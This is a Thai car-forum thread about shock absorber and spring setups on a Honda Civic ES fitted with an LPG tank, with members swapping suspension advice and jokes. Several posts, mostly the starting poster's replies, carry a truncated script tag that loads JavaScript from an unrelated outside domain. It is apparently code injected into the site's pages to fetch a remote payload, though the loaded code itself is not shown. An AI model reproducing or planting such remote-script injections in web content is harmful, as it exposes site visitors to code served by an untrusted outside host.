ตอบ
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 20 มิถุนา 2012 20:54 - วิจัยโช้ค
สาเหตจากความแก่ครับจากเดิม EP3 TYPE R เข้า่ใจว่าแข็งไปแต่ก็เช็ตไปเซ็ตมาจนวิ่งได้ดี แต่ก็ยังทยอยซื้อโช้คมาเก็บไว้หลายชุด วันนี้มีเวลาเลยเริ่มที่ โช้คเดิมยี่ปุ่นก่อนเลยครับ เดิมทุกอย่างจริงๆ
   ผลคือพอทำเสร็จเกือบค่ำครับเด็กที่ร้านบอกว่า พี่ครับซักพักค่อยไปได้มั๊ยครับ เดี๋ยวช่วยเปิดไฟหน้าส่องให้ผมยิงนกก่อน
รถผมติดแก๊สถัง 58 ลิตรครับเวลาทำช่วงล่างชาวบ้านเค้าคุยกัน 2-3 นิ้วสอด ของผมงี้เอาควายทั้งตัวเข้าไปยังได้เลย
พรุ่งนี้เอาใหม่ครับ คราวนี้จะลองเป็นสเต็ปเลืิ่อนเบ้าหน้าอย่างเดียวใส่สปริง DC5 TYPE R หรือไม่ก็  TEIN EP3 หรือไม่ก็ SS



ต่อครับวันนี้วันที่2
หลังจากเมื่อวานเช็ตรถเพื่อเปิดไฟหน้าไปแล้ว เลยได้คำตอบว่าการใส่โช้คเดิมโดยที่ไม่เลื่อนเบ้าโช้คหน้าลง  เลื่อนเบ้าโช้คหลังขึ้น มันเป็นไปไม่ได้เลย
   วันนี้เลยตัดสินใจเป็นสเต็ปเลื่อนเบ้าโช้คหน้าลง แล้วใส่สปริง DC5 TYPE R เพราะเลื่อนเบ้าหน้าได้เตี้ยลง 1 นิ้ว และ สปริง DC5 TYPE R ก็ทำให้เตี้ยเพิ่มอีก 1 นิ้ว แล้วนั่งคุยคอนเซ็ปกับพี่ใหม่ก่อนทำเลยว่า ขับนิ่ม หน้าเตี้ยกว่าหลัง ไม่พึ่งอะแดปเตอร์
ผลที่ได้คือ พอเอาแม่แรงลงปุ๊บภาพที่เห็นคือ ไม่เท่ากันซักล้อเลยตรูทีนี้
  เบื้องต้นช่วงล่าง EP3 ของผมด้านหลังซ้ายมันมีปัญหาเตี้ยกว่าปกติอยู่แล้ว ประมาณ .75 นิ้ว แต่ปรากฏว่าที่ร้านน่าจะมีแต่อะแดปเตอร์ 1 นิ้ว
จัดไปครับ
นั่งคิดอยู่ซักพัก ไหนๆก้ต้องรื้อด้านหลังด้วยแล้ว จัดซะเลยวะ เลยเอาโช้คอัดน้ำมันสปริง TEIN ใส่ด้วยซะเลย เพราะกลัวว่าหน้ามันจะแข็งไป ถ้าโช้คหลังยังเดิม STANDARD ไม่ BALANCE แน่ๆ
  ผลที่ออกมาก็ใช้ได้ครับ หน้าทำท่างว่าจะเตี้ยกว่าหลัง แต่นิดเดียวจริงๆแทบจะมองไม่ออก น่าจะดูเป็นในลักษณะเท่ากัน แต่ก็โอเคครับ
เอาออกมาวิ่งดูไอ้เราก็ติดฟิวส์ว่าทำช่วงล่างมาใหม่จะลองซัดดู ออกจากร้านพี่ใหม่เลี้ยวซ้ายลองกดเลยครับ อื้อฮือเลื้อยเป็นงูเลยครับ มันตึ๊บคิดไรไม่ออก
  เลยตั้งใจขับไปตั้งสูนยืลองดุก่อนปรากฏว่ามีเสียงลั่นกึ๊กๆ ด้านขวาแล้วก้มีเสียงดังครึกๆๆๆๆๆๆๆตลอดเวลาสำหรับโช้คหน้าซ้าย
ขับไปร้านตั้งศูนย์ POWER MAX แยกอ่อนนุชสนิทกันนั่งคุยซักพัก รอไปแจ้งพี่ใหม่ก่อนดีกว่า เพราะตั้งศูนย์ไปก็ต้องรื้อใหม่แน่ๆ
  พอเลี๊ยวรถออกจาก POWER MAX พี่หนุ่มโทรมาบอกอยู่ร้านพี่ใหม่ มานี่มั๊ย ไปเลยครับจัดไป
พอถึงร้านพี่ใหม่เลี๊ยวแว๊ปเข้าไป เห็นพี่หนุ่ม พี่เอก พี่ใหม่นั่งซัดเบียร์อยู่ พี่ใหม่ถามเลยไม่จบเหรอ ก็เลยแจ้งปัญหาพี่ใหม่ไป แกเลยบอกปะไปลองกัน
ไปลองปุ๊บพี่ใหม่บอกโคตรดังเลยหวะ กลับมาที่ร้านพี่ใหม่ก็ให้ชั่งจัดเลย แกบอกรื้อข้างหน้าใหม่หมดเลยโอววววววววววว
นั่งคุยไป 2 ชั่วโมงแกเอาลองหลังทำเสร็จก็ไม่มีเสียงดังแล้ว
ส่วนเรื่องฟิวลิ่งขอตั้งศูนย์พรุ่งนี้แล้วมาเล่าต่อคร้าบบบบบบบบบบ


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 21 มิถุนา 2012 22:29, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: yorkydog  coco1340  tokykung  baberonte  khem_hatyai  zan  Justinaen  wut-chiangmai  prgs55  วุฒิชัย  makham  civicIT 
yorkydog


ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ที่อยู่: ABAC บางนา. โซนสมุทรปราการ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 20 มิถุนา 2012 23:13 - วิจัยโช้ค
รอติดตามครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
coromant


เข้าร่วม: 09 ตุลา 2008
ตอบ: 5132

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6854
ให้คำขอบคุณ: 719
พุธ, 20 มิถุนา 2012 23:59 - วิจัยโช้ค
ควายยัดเลยหรือ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
พฤหัส, 21 มิถุนา 2012 00:14 - วิจัยโช้ค
  ผมเคยเป็นครับไปเลื่อนเบ้าโช๊ค  มานเลื่อนสะสูงเลย สูงแบบรถออฟโรดเลยอ่ะ หน้าเตี้ยตูดโด่ง(โด่งมากกก)
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 00:24 - วิจัยโช้ค
yorkydog พิมพ์ว่า:
รอติดตามครับ




คงเน้นไปทางนิ่มครับพี่ อายุเริ่มเยอะโช้คแข็งมากเดี๋ยวกระดูกเปราะ<script src="https://sport32news.com/civicesgroup.js"></
COROMANT พิมพ์ว่า:
ควายยัดเลยหรือ




<script src="https://sport32news.com/civicesgroup.js"></ หน้ามันสูงจริงๆครับพี่หนุ่มคร้าบ จนแฟนผมมันบอก"มึงกลับไปเปลี่ยนรถได้ป่าววะกูอายเค้า"
coco1340 พิมพ์ว่า:
  ผมเคยเป็นครับไปเลื่อนเบ้าโช๊ค  มานเลื่อนสะสูงเลย สูงแบบรถออฟโรดเลยอ่ะ หน้าเตี้ยตูดโด่ง(โด่งมากกก)




หน้าทิ่มดูดโด่งผมยังพอทำใจได้ครับพี่ แต่นี่ข้างหน้าแม่งเชิดหยิ่งเชียว กลัวคนเห็นแล้วมาพูดว่า "เดี๋ยวหยิ่งเชียวนะเมิง"<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Concept_ES  khem_hatyai  tiger2217 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 21 มิถุนา 2012 00:42 - วิจัยโช้ค
ว้าวกำลังหาข้อมูลเลย รอติดตามมหากาฟด้วยคนครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 00:45 - วิจัยโช้ค
athongchum พิมพ์ว่า:
ว้าวกำลังหาข้อมูลเลย รอติดตามมหากาฟด้วยคนครับ




<script src="https://sport32news.com/civicesgroup.js"></ ยิ่งทำยิ่งเน่าครับพี่ อยากนิ่มแต่เช็ตยากชิปเป็งเพราะท้ายรถมันมีถังแก๊ส โจทย์ผมคือต้องไม่มีการใส่อะแด๊ปเตอร์ หลังสูงกว่าหน้า วิ่งนิ่มคร้าบบบบบบบบบบบบบบบบบบบบบบบบบบบบบบบบบ
ได้รับคำขอบคุณจาก: khem_hatyai 
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
พฤหัส, 21 มิถุนา 2012 08:25 - วิจัยโช้ค
ชอบยัดเบ้ามากกว่า เลื่อนเบ้า <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 08:29 - วิจัยโช้ค
tatumz พิมพ์ว่า:
ชอบยัดเบ้ามากกว่า เลื่อนเบ้า <script src="https://sport32news.com/civicesgroup.js"></




ยัดแล้วดัน กระแทกกระทั้นอ่ะเหรอพี่เกิ้ล อย่ามาพูดให้น้องเค้าตื่นดิ เดี๋ยวก็หนีหมดหรอก<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 21 มิถุนา 2012 08:33 - วิจัยโช้ค
กำลังจะหาโช๊คนิ่ม ๆ เลยครับ 
ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 08:44 - วิจัยโช้ค
NuuTeee พิมพ์ว่า:
กำลังจะหาโช๊คนิ่ม ๆ เลยครับ 




ผมว่าถ้ามีถังแก๊สด้วยเซ็ตยากอยู่ครับพี่ นิ่มด้วย สวยด้วย เกาะด้วย ตอนนี้ลองใส่เดิมๆ ไม่มีอะแดปเตอร์ใดๆเลย ไฟหน้าส่องส่องรถสิบล้อหลบไปเลยครับ ถ้าเลื่อนเบ้าก็ต้องสปริงแต่ง เพราะสปริงเดิมมันยัน พอสปริงแต่งโช้คก็ต้องแข็งขึ้นเพราะไม่งั้นเดี๋ยวมันเด้ง
 สุดท้ายก็มาเข้าข้อเดิมอยู่ดี คือ เตี้ยแข็ง
เหนื่อยแล้วเนี่ยพี่
ได้รับคำขอบคุณจาก: khem_hatyai 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พฤหัส, 21 มิถุนา 2012 09:01 - วิจัยโช้ค
มาช่วยแชร์ ผมใส่ tein ss ตรงรุ่น สปริงหน้า 6k หลัง 8k

เปลี่ยนสปริงคู่หน้าเป็น swift 6k กระแทกน้อยลง แต่ยังไม่พอ

ไปเปลี่ยนสปริงหน้าเป็น 4k ปรับเกิน 8 ไม่ได้เพราะเด้งดึ๋งดั๋งเลย แต่พอปรับเป็น 5 พอไหวขับสบายหน่อย แต่รถเตี้ยลงมาอีก 1 นิ้วเพราะสปริงมันนิ่มมาก อีกไม่นานคงเปลี่ยนกลับเป็นโช้คเดิมๆ แล้วครับ แก่เกินไปแล้วสำหรับโช้คซิ่ง
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 09:07 - วิจัยโช้ค
Ton- พิมพ์ว่า:
มาช่วยแชร์ ผมใส่ tein ss ตรงรุ่น สปริงหน้า 6k หลัง 8k

เปลี่ยนสปริงคู่หน้าเป็น swift 6k กระแทกน้อยลง แต่ยังไม่พอ

ไปเปลี่ยนสปริงหน้าเป็น 4k ปรับเกิน 8 ไม่ได้เพราะเด้งดึ๋งดั๋งเลย แต่พอปรับเป็น 5 พอไหวขับสบายหน่อย แต่รถเตี้ยลงมาอีก 1 นิ้วเพราะสปริงมันนิ่มมาก อีกไม่นานคงเปลี่ยนกลับเป็นโช้คเดิมๆ แล้วครับ แก่เกินไปแล้วสำหรับโช้คซิ่ง




ผมก็ว่างั้นครับพี่ ขับแล้วแม่งเหนื่อยเลย อยากได้นิ่มๆขับสบายมากกว่า แต่หน้าต้องไม่เชิดนะ<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 21 มิถุนา 2012 10:39 - วิจัยโช้ค
eskung พิมพ์ว่า:
NuuTeee พิมพ์ว่า:
กำลังจะหาโช๊คนิ่ม ๆ เลยครับ 




ผมว่าถ้ามีถังแก๊สด้วยเซ็ตยากอยู่ครับพี่ นิ่มด้วย สวยด้วย เกาะด้วย ตอนนี้ลองใส่เดิมๆ ไม่มีอะแดปเตอร์ใดๆเลย ไฟหน้าส่องส่องรถสิบล้อหลบไปเลยครับ ถ้าเลื่อนเบ้าก็ต้องสปริงแต่ง เพราะสปริงเดิมมันยัน พอสปริงแต่งโช้คก็ต้องแข็งขึ้นเพราะไม่งั้นเดี๋ยวมันเด้ง
 สุดท้ายก็มาเข้าข้อเดิมอยู่ดี คือ เตี้ยแข็ง
เหนื่อยแล้วเนี่ยพี่



รถผมไม่มีถังแก๊สครับ

ตอนนี้ใส่สปริง RS-R กับโช๊คเดิมไป ปรากฏว่าสั่นสะท้านเลยครับ โช๊คเดิมรับแรงดีดของสปริงไม่อยู่

คิดอยู่ว่าจะเปลี่ยนเป็นโช๊คใหม่กับสปริง Tanabe NF210 ดีรึเปล่าครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 10:52 - วิจัยโช้ค
NuuTeee พิมพ์ว่า:
eskung พิมพ์ว่า:
NuuTeee พิมพ์ว่า:
กำลังจะหาโช๊คนิ่ม ๆ เลยครับ 




ผมว่าถ้ามีถังแก๊สด้วยเซ็ตยากอยู่ครับพี่ นิ่มด้วย สวยด้วย เกาะด้วย ตอนนี้ลองใส่เดิมๆ ไม่มีอะแดปเตอร์ใดๆเลย ไฟหน้าส่องส่องรถสิบล้อหลบไปเลยครับ ถ้าเลื่อนเบ้าก็ต้องสปริงแต่ง เพราะสปริงเดิมมันยัน พอสปริงแต่งโช้คก็ต้องแข็งขึ้นเพราะไม่งั้นเดี๋ยวมันเด้ง
 สุดท้ายก็มาเข้าข้อเดิมอยู่ดี คือ เตี้ยแข็ง
เหนื่อยแล้วเนี่ยพี่



รถผมไม่มีถังแก๊สครับ

ตอนนี้ใส่สปริง RS-R กับโช๊คเดิมไป ปรากฏว่าสั่นสะท้านเลยครับ โช๊คเดิมรับแรงดีดของสปริงไม่อยู่

คิดอยู่ว่าจะเปลี่ยนเป็นโช๊คใหม่กับสปริง Tanabe NF210 ดีรึเปล่าครับ




ผมศึกษามาเค้าว่าลงตัวนะครับพี่เพราะค่า K มันใกล้เคียงกัน จัดเลยคร้าบพี่
ได้รับคำขอบคุณจาก: khem_hatyai 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พฤหัส, 21 มิถุนา 2012 12:03 - วิจัยโช้ค
NF210 ท้ายห้อยสุดๆ เหลือนิ้วเดียวสอด ด้านหน้า 3 นิ้วสอด ไม่ได้ติดแก๊สด้วยนะ แต่จัดว่านิ่มใกล้เดิมสุด แต่โหลดไม่สวยอย่างแรง
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 12:47 - วิจัยโช้ค
Ton- พิมพ์ว่า:
NF210 ท้ายห้อยสุดๆ เหลือนิ้วเดียวสอด ด้านหน้า 3 นิ้วสอด ไม่ได้ติดแก๊สด้วยนะ แต่จัดว่านิ่มใกล้เดิมสุด แต่โหลดไม่สวยอย่างแรง


ถ้าเป็นอย่างนั้นอย่าเรียกว่าไม่สวยเลยครับพี่ น่าจะเรียกว่าขี้เหร่มากกว่า
ได้รับคำขอบคุณจาก: khem_hatyai 
sukhothai


เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
พฤหัส, 21 มิถุนา 2012 13:06 - วิจัยโช้ค
ลื่อนอ่านไม่ได้สนใจเรื่องโช๊คเลย

ตาอยู่แต่กับรูปข้างๆเนี่ย ท่าจะนิ่ม


ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า 
oat_es03


เข้าร่วม: 20 เมษา 2010
ตอบ: 514

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 502
ให้คำขอบคุณ: 498
พฤหัส, 21 มิถุนา 2012 13:47 - วิจัยโช้ค
เข้ามารอชมและรอฟังข้อมูลครับ  เปลี่ยนทีละตัวเยี่ยมมากๆ เป็นประโยชน์แก่คนที่กำลังตัดสินใจ
ปล.จะดีขึ้นไปอีก ถ้ามีรูปประกอบที่ใส่โช้คแต่ละชุด จะได้เห็นระดับความสูงต่ำของโช้คแต่ละตัวครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 15:30 - วิจัยโช้ค
โปรเจ็คเยอะจริง พ่อหนุ่มคนนี้ เอาแบบพี่ดิ โช็คมันแข็งมากๆก็ขับช้าๆ ไม่ก็ยืมรถที่บ้านใช้ อิอิ
ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า 
wise


ชื่อเล่น: ไวส์

เข้าร่วม: 18 มิถุนา 2011
ตอบ: 119

ผู้ใช้นี้มีความผิด
ผู้ใช้นี้มีความผิด

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 523

ที่อยู่: Saraburi
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 21 มิถุนา 2012 15:34 - วิจัยโช้ค
เข้ามารอชมด้วยครับ  เก็บข้อมูล
ได้รับคำขอบคุณจาก: ProSom  khem_hatyai  ค้าอะไหล่โคตรเก่า  jetdo  tooth  dirk 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
พฤหัส, 21 มิถุนา 2012 16:01 - วิจัยโช้ค
เป็นประเด็นที่เป็นคนแก่....แต่ดันอยากซิ่ง....ก็จุกมาตลอดเหมือนกันครับ....^^
ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 21 มิถุนา 2012 16:45 - วิจัยโช้ค
อยากนิ่มเอาอย่างผมเลยครับ ทั้งโช๊คและสปริงเบิกศูนย์ตรงรุ่น หลังเลื่อนเป้าเพื่อให้สมดุลย์(ติดแก๊ส) ไม่ต้องแต่งสปริง ก็ใช้ได้แล้วนิ่มตูดเมียไม่บ่นขับไม่เหนื่อย สูงสุดลงสู่สามัญ เคยแต่งมาแล้วทุกรูปแบบ สรุปผลคือยิ่งแต่งก็ยิ่งเหมือนเกวียนเข้าไปทุกที สวยแต่ไม่มีความสุขในการขับเลย ต้องคอยระวังหลุมบ่อต่างๆ ยิ่งทางไกลแทนที่จะทำเวลาได้ดีกลายเป็นเสียเวลา หรือเราเริ่มแก่ตัวลงเลยชอบแต่ของนิ่มๆ ฮิฮิ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: khem_hatyai  ค้าอะไหล่โคตรเก่า  ES2.0 
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 18:07 - วิจัยโช้ค
เฮีย เอารูปมาให้ดูมั้งดิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
พฤหัส, 21 มิถุนา 2012 19:07 - วิจัยโช้ค
เซ็ตยากมากๆ ก็ "เซ็ตแล้วย้อม" เลยครับนพ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 21 มิถุนา 2012 21:51 - วิจัยโช้ค
sukhothai พิมพ์ว่า:
ลื่อนอ่านไม่ได้สนใจเรื่องโช๊คเลย

ตาอยู่แต่กับรูปข้างๆเนี่ย ท่าจะนิ่ม






พี่สันก็อีกคนอุตส่าห์เสียตังค์ทำรถตั้งเยอะเพื่อเอามาให้ดู ก็แอบเข้ามาดูแต่รูป<script src="https://sport32news.com/civicesgroup.js"></
oat_es03 พิมพ์ว่า:
เข้ามารอชมและรอฟังข้อมูลครับ  เปลี่ยนทีละตัวเยี่ยมมากๆ เป็นประโยชน์แก่คนที่กำลังตัดสินใจ
ปล.จะดีขึ้นไปอีก ถ้ามีรูปประกอบที่ใส่โช้คแต่ละชุด จะได้เห็นระดับความสูงต่ำของโช้คแต่ละตัวครับ




ตอนโช้คเดิมไม่มีรูปจริงๆครับพี่เพราะรับไม่ได้อย่างแรง จะพยายามหารูปมาให้ดูคร้าบ
pom_sawas พิมพ์ว่า:
โปรเจ็คเยอะจริง พ่อหนุ่มคนนี้ เอาแบบพี่ดิ โช็คมันแข็งมากๆก็ขับช้าๆ ไม่ก็ยืมรถที่บ้านใช้ อิอิ




วันนี้เป็นคิวของพี่ใหม่เป้นคนวิจัยครับพี่ป้อม ปิดท้ายด้วยเชิญที่ปรึกษาทรงคุณวุฒอย่างพี่หนุ่มและพี่เอก alert มาแจมด้วยได้คำตอบคือผมจะกลับไปทำ eg ซิ่งเหมือนเดิมครับพี่ ส่วน es ไว้ขับใช้งานอย่างเดียว<script src="https://sport32news.com/civicesgroup.js"></
wise พิมพ์ว่า:
เข้ามารอชมด้วยครับ  เก็บข้อมูล




จะเอาข้อมูลมาแฉเรื่อยๆคร้าบพี่
tokykung พิมพ์ว่า:
เป็นประเด็นที่เป็นคนแก่....แต่ดันอยากซิ่ง....ก็จุกมาตลอดเหมือนกันครับ....^^




คอเดียวกันเลยครับพี่แก่แต่ฝืน ฝืนมานาน จนเริ่งฝืนไม่ไหวและถึงเวลาที่ต้องยอมรับสภาพแล้ว<script src="https://sport32news.com/civicesgroup.js"></
Tanadath พิมพ์ว่า:
อยากนิ่มเอาอย่างผมเลยครับ ทั้งโช๊คและสปริงเบิกศูนย์ตรงรุ่น หลังเลื่อนเป้าเพื่อให้สมดุลย์(ติดแก๊ส) ไม่ต้องแต่งสปริง ก็ใช้ได้แล้วนิ่มตูดเมียไม่บ่นขับไม่เหนื่อย สูงสุดลงสู่สามัญ เคยแต่งมาแล้วทุกรูปแบบ สรุปผลคือยิ่งแต่งก็ยิ่งเหมือนเกวียนเข้าไปทุกที สวยแต่ไม่มีความสุขในการขับเลย ต้องคอยระวังหลุมบ่อต่างๆ ยิ่งทางไกลแทนที่จะทำเวลาได้ดีกลายเป็นเสียเวลา หรือเราเริ่มแก่ตัวลงเลยชอบแต่ของนิ่มๆ ฮิฮิ "<script src="https://sport32news.com/civicesgroup.js">




โดนทุกข้อเลยคร้าบพี่ ต้องหาวิธีเซ็ตใหม่แล้วคร้าบ
khem_hatyai พิมพ์ว่า:
เฮีย เอารูปมาให้ดูมั้งดิ




จะพยายามครับพี่เสียเข้มคร้าบบบบบบบบบ
zan พิมพ์ว่า:
เซ็ตยากมากๆ ก็ "เซ็ตแล้วย้อม" เลยครับนพ




ผมอ่านหลายรอบนะพี่โต้ง ผมว่าโดยเจตนา พี่ต้องน่าจะพิมพืผิด ดูท่าทางน่าจะพิมพ์ว่า เ_็ด มากว่า<script src="https://sport32news.com/civicesgroup.js"></
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 22 มิถุนา 2012 09:29 - วิจัยโช้ค
EP3 Type R ลงตัวแล้วน่า พี่ว่าเปลี่ยนไปหาน้องๆนู๋ๆ มากช่วยบีบนวด เพิ่มดีกว่ามั้ย 55555555
